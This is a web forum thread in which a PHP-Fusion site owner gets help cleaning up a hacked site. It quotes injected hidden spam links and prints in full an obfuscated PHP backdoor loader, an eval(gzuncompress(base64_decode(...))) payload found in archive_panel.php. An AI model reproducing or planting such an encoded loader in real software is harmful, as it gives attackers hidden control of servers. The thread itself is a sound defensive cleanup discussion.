Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?

Blank page on site

Asked Modified Viewed 5,964 times
B
Bo Schlichting
B
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
asked
Newbie

Hi experts. :)

I have a site www.poetryboy.dk, which lately have started to just show a blank gray page and redirecting to www.poetryboy.dk/news.php.

I have been told by my domain support that it is because I use PHP 6 and should use PHP 7.
So can this be correct and how do I goa about it as I have not access to the admin page.
I have of course access to the file manager, but are not a good at php.

I have made a backup of all files and downloaded the
So can I just download the 7-00-06_7-00-07_combo_update, but wonder if I just should upload these files to the similar folders with the filemanager or is there more to it as I expect?

Best regards,
Bo
0 replies

10 posts

H
HobbyMan
H
Just some Guy
  • Veteran Member, joined since
  • Contributed 1,486 posts on the community forums.
  • Started 91 threads in the forums
answered
Veteran Member

If you look at your source code in your browser [in View - Page Source or Source], you'll see you've got serious spam messing up your site.

Also, the version you're using [v6.01.5] is way out of date. The thing about a cms like this is you must stay updated.

Read this: http://www.php-fusion.co.uk/forum/vie...pid=138412
0 replies
A
afif
A
afif 10
  • Member, joined since
  • Contributed 183 posts on the community forums.
  • Started 12 threads in the forums
answered
Member

Bo Schlichting,

I dont think you can directly upgrade from 6.01.5 to 7.0.0.7. You need to upgrade 1 by 1..means from 6.01.5 > 6.01.6 > 6.01.7 > ........................... > 7.0.0.7
0 replies
B
Bo Schlichting
B
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
answered
Newbie

HI

Thank you very much for the info.
I might know a lot about IT, but PHP and internet is not one of my strengths.

I can though see your point in the following code which I do expect is the one you are refering to:

Quote

<div style="position:absolute;left:-4000px"><a href="http://www.fmicrosoft.com/microsoft-windows-xp-professional-x64-oem-download.html">oem soft Microsoft Windows XP Professional x64</a> oem <a href="http://www.fmicrosoft.com/microsoft-works-7-oem-download.html">oem soft Microsoft Works 7</a> buy discount <a href="http://www.fmicrosoft.com/microsoft-works-9-oem-download.html">oem soft Microsoft Works 9</a></div><div style="display:none">

Latest news:<br/>
<!--gdtg--><ul>
<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/google-lab-edition/">Google chat labs edition</a></li>
<li><a href="http://www.radawiecrc.pl/infusions/navigation_panel/cd/crear-un-correo-electronico-en-hotmail-com/">Crear un correo electronico con</a></li>
<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/google-chat-labs/">Google labs email</a></li>
<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/google-labs-speed-test/">Google labs sets</a></li>
<li><a href="http://www.radawiecrc.pl/infusions/navigation_panel/cd/the-pirate-bay-skull-and-crossbones/">Axxo tracker thepiratebay org</a></li>
<li><a href="http://www.radawiecrc.pl/infusions/navigation_panel/cd/the-pirate-bay-dark-knight/">Open tracker thepiratebay org announce</a></li>
<li><a href="http://www.radawiecrc.pl/infusions/navigation_panel/cd/the-pirates-bay/">Ww thepiratebay org</a></li>

<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/google-labs-not-showing/">Google suggest lab</a></li>
<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/labs-google-co-in-smschannel/">Google m labs</a></li>
<li><a href="http://www.thegreenzone.dk/infusions/navigation_panel/mobile/google-labs-multiple-inboxes/">Google labs multiple inboxes</a></li>

</ul>
</div>


So now is the question though, where have they placed it, so I can get rid of it? :D
Which file would you expect me to look in?

Regarding the upgrade - well a friend did help me with setting up the site, but he did not tell me about the constant upgrade, but I look into that when I have removed the malsious code and ensured that all passwords are reneved for my users and admins.

Best regards,
Bo
0 replies
C
Craig
C
Craig 14
  • Fusioneer, joined since
  • Contributed 4,462 posts on the community forums.
  • Started 212 threads in the forums
answered
Fusioneer

Look in infusions/navigation_panel/navigation_panel.php
0 replies
B
Bo Schlichting
B
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
answered
Newbie

Ok it gives me the following code:

Quote

<?php
/*---------------------------------------------------+
| PHPFusion 6 Content Management System
+----------------------------------------------------+
| Copyright © 2002 - 2006 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------*/
if (!defined("IN_FUSION"wink) { header("Location: ../../index.php"wink; exit; }

openside($locale['001']);
$result = dbquery("SELECT * FROM ".$db_prefix."site_links WHERE link_position<='2' ORDER BY link_order"wink;
if (dbrows($result) != 0) {
while($data = dbarray($result)) {
if (checkgroup($data['link_visibility'])) {
if ($data['link_name'] != "---" && $data['link_url'] == "---"wink {
echo "<div class='side-label'><b>".$data['link_name']."</b></div>\n";
} else if ($data['link_name'] == "---" && $data['link_url'] == "---"wink {
echo "<hr class='side-hr'>\n";
} else {
$link_target = ($data['link_window'] == "1" ? " target='_blank'" : ""wink;
if (strstr($data['link_url'], "http://"wink || strstr($data['link_url'], "https://"wink) {
echo "<img src='".THEME."images/bullet.gif' alt=''> <a href='".$data['link_url']."'".$link_target." class='side'>".$data['link_name']."</a><br>\n";
} else {
echo "<img src='".THEME."images/bullet.gif' alt=''> <a href='".BASEDIR.$data['link_url']."'".$link_target." class='side'>".$data['link_name']."</a><br>\n";
}
}
}
}
} else {
echo $locale['002'];
}
closeside();
?>


But it does not give me any serious idea on what to change? smile

ADMIN: Smileys Disabled in post by F_C
Edited by Craig on 20-02-2010 18:39,
0 replies
C
Craig
C
Craig 14
  • Fusioneer, joined since
  • Contributed 4,462 posts on the community forums.
  • Started 212 threads in the forums
answered
Fusioneer

Nope that is ok.

Look in subheader.php your theme.php look through all image and attachments folders.

Edit: Also do you have access to your site Access logs?
Edited by Craig on 20-02-2010 18:40,
0 replies
B
Bo Schlichting
B
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
answered
Newbie

Ok I will go hunting. :)

In /infusions/navigation_panel/archive_panel.php
Did I find this.

Could it be it?
<?eval(gzuncompress(base64_decode('eJylWG1P3EYQ/h4p/2FwLWzDcXeQRI0ODhQFGqQmCoVrvwC1fPb67OLzuut1gKb8987u+m1tH01TS+jW63mfZ2dmAQAwM0YfHt2I5hzmYFmHL19As51RJran1W5AlsWq3FBbcQj2Flln/NE2vSSh926cObC9DaZ7dXb529nltXF59unz4sx9d3p6adzC1hwaQiVDPOQh5lJoWKQ+j2kKSpdtrvOVA18V5SqhSy8p7ThsLFAbDhDGKHMTurKtLMqkDzOwxiCEjGDqIMtTZXmR5oTbZsESp3Iv5yzO3Ih4AWFtt5HQ9WnKScpd/piR1jepveXqL7+eXS3cT2eL88+n6O0cY/rhbGHVHohHGmsbuA+M/FmQnBuVCeL5Af4oMBuZtyJwH/MI4jQreN4QyJjHuTTfRSnXFjph3TqakpaiPKL3UpxUQ/yIgvXyxVHE18nx0ZIGj8f4FlK2hjXhEQ3mxsXnq4UhdqVqED7PDU4euAGpt8Y1KjQgj//C5Y/THmVeLNdxTbsiuPziJQWuT+l9mlAv+BcWP4n9uzWp2T4QDh4kcXonGSfCWLmQ1h9NpCvWoe59CanqtR1gNB/iHCLyACT1aUACzAQCC/cbsicgSU42xDQoHYHlYy1CBMXpGCHwhXDJPP/ONs53jBFoKetSdxC4fzisnNQKZ1KDpvZJLUvzvwGgItuDCBUfBiHaByujPkGLOIUqMjpeK7gKkdcWQuIZvLZjK217PraVUBnR/xjQoaO9v8FRHyHCCdBlWOQ+rgIJSMx+IKHWA07f7RLWz7he6mgDU6L+O1xPYsyLjXhDYQ7SFqkEoXWO9RCjkpBUFb+dgxG0q2CtQno3bwq5dXF+geuPP1m3MLZOkGUuSiuK73D+YIpTjKx4qFGTjX/Mj5hUNwJjYjgj2H+mFHkQMRKicGnC2Dq+jFcR35PRwxJ1NPGOwcOoX3lfCNgfkcaBhccQVPAuh6MlFoTl/6kOjKyKxGMV8iFkdA2oHTECsqd8Y43YwL9i3rqfUCRuJRTftITqZ7p/Uov0LsVTM3hYW57Wza9Gs6d7WRfAFngFNoaqQ1lEkUZTJ+hdX9Y8lhMX3+wuvEpnZQeUSD5fLC4m++P9G3aTGjDWQ4OPdY7zCXZyGJfiry0xsQgggl3tiGEFd07AmlkNXbmLzFji+pINofI9TVMip44Z5onmRGxKWw57XqPpM+mAdLqK5l2cJHBHSLbnJfEXkmPPrjJexvf5BFoYRR6nKzD8ri0GqOplaRFMk1QUADxaGc1tYc9I+SLNbpPKaUHSO5vY0mdYvtalyUstREksyh3+0bC0S/ra4E7BrQKstLWiqwuC0jsdKXs0vxraDI+hy0iWeD6xrcnvP4vovhPRnY13Tuyb9G/TmcTr3Bphakc1Z1lavkGgfSHO8p5z0kr/90gez1XkjXEzCjdTtSMAqTRZFQqtHuCs/ulo5Oth02KmwqzWVZ4iigLLUa5Oq0hp37ahYx3EDE0zOmgbAI3Ri0YynGIdWvaWTMTa436EabBv7nedm3zXvrnadezxjjOpQo69wpRUJN/YL2WNEeiDtlSnV1471f5JL1d6sSp1Xh/c6g6qK5KgvzbEi9Eu0GZ5VVKfxYshSpH2OoO304E8V/r2sZoZYPRrlF1K8XjUFqpeEVKTwcpWcuG5ZI+SzTgxxqBvbqqKtU2vbgfgV4NvUzeSCDMGo9eAbyh4za1Tw3clN5JdQMo6BEE1U6yoqq7FZpihpDCn/h3NSIphEOQjRYg/eEVMqfpFp0bwato+IlvIPnQoGnmhFyckmFUCUL6UqEMuYzFWfqNsa1N4M532GLr9peR5r4bRvQUOozMQdy45vwx1pJKjPT3h8CPvwGIC0ucfnVWfCcRP2cmEnzgSi7F4meAae5KNMSkvz10SHq8JLbiieNMi0tKWY78QvU1vnYIgvGcxJ4pdfKj2S8YlwYsegYTSrGapyqIrrxw4oQTtmzqWd4r3+va/Mu4jTBhmNiQ0FJr0WmKKW0GIs1CgrDiYvn6rXcZLU7DHCTOE/b1WqV8ytrdhq29kr4B1BIOUUbXUnppWUDh7FMHEm9ZALx6aK3MVEmxTJut+7c0DilifJcD0AhHl1x1ufUx4TlaqyTnQxoOuJHEbi9OCDHvfGT1CWqRBz2mVlM7NrpeBttQHzjxfDmAly55g6QmWMRsaZypXh2aajq4mxZtyVrnQdDTXSxI5slTVAecUx75hJ+1ZpZlTNrfN6sFzhSGK5dEB/D1Cv4uUN81vis0PdnfNeKMIGQuf6x3s2oy799CBEFQx3pkJCYP+V4/yyUayTVRP/e3OVudVlc1+7hSAdyVKe8doqOq0/1GgeuGQovrQlWaEcuADWYr0cueFHOuHVu3+Afq3slc=')));?>


ADMIN:: Code BB Code added By F_C
Edited by Craig on 20-02-2010 19:02,
0 replies
C
Craig
C
Craig 14
  • Fusioneer, joined since
  • Contributed 4,462 posts on the community forums.
  • Started 212 threads in the forums
answered
Fusioneer

Yes OK Delete that file and upload a new one then upgrade to the latest version.
0 replies
B
Bo Schlichting
B
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
answered
Newbie

Ok, It did not do it. But there is probally more bad files.
I will work my way through them.

Thank you very much so far. :)

Best regards,
Bo
0 replies
C
Craig
C
Craig 14
  • Fusioneer, joined since
  • Contributed 4,462 posts on the community forums.
  • Started 212 threads in the forums
answered
Fusioneer

Good luck with it mate.
0 replies

Labels

None yet

Statistics

  • Views 0 views
  • Posts 10 posts
  • Votes 0 votes
  • Topic users 4 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet